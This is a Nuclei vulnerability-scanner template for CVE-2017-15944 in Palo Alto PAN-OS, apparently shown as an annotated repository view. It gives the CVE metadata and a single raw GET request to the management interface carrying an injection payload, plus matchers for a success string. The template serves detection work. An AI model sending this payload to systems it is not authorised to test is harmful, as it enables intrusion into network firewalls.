nuclei-templates/http/cves/2017/CVE-2017-15944.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2017-15944
info:
name: Palo Alto Network PAN-OS - Remote Code Execution
2021-07-17 11:37:28 +00:00
author: emadshanab,milo2012
severity: critical
description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest security patches and updates provided by Palo Alto Networks.
reference:
- https://www.exploit-db.com/exploits/43342
- https://security.paloaltonetworks.com/CVE-2017-15944
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-15944
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1040007
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-15944
epss-score: 0.97344
epss-percentile: 0.99872
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: paloaltonetworks
product: pan-os
2023-12-05 09:50:33 +00:00
tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect,paloaltonetworks
http:
2021-07-17 11:37:28 +00:00
- raw:
- |
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{randstr}};
matchers-condition: and
matchers:
- type: word
2021-11-11 17:29:29 +00:00
part: body
words:
2021-07-17 11:37:28 +00:00
- "@start@Success@end@"
- type: status
status:
- 200
# digest: 4b0a00483046022100b0524ec37a83dc42c2b65d5aaac79624687b7227515255ee075850523e653201022100899414ace80feab0f8077de3482984940b0ffa4b302405b75e6a9f900662f65b:922c64590222798bb761d5b6d8e72950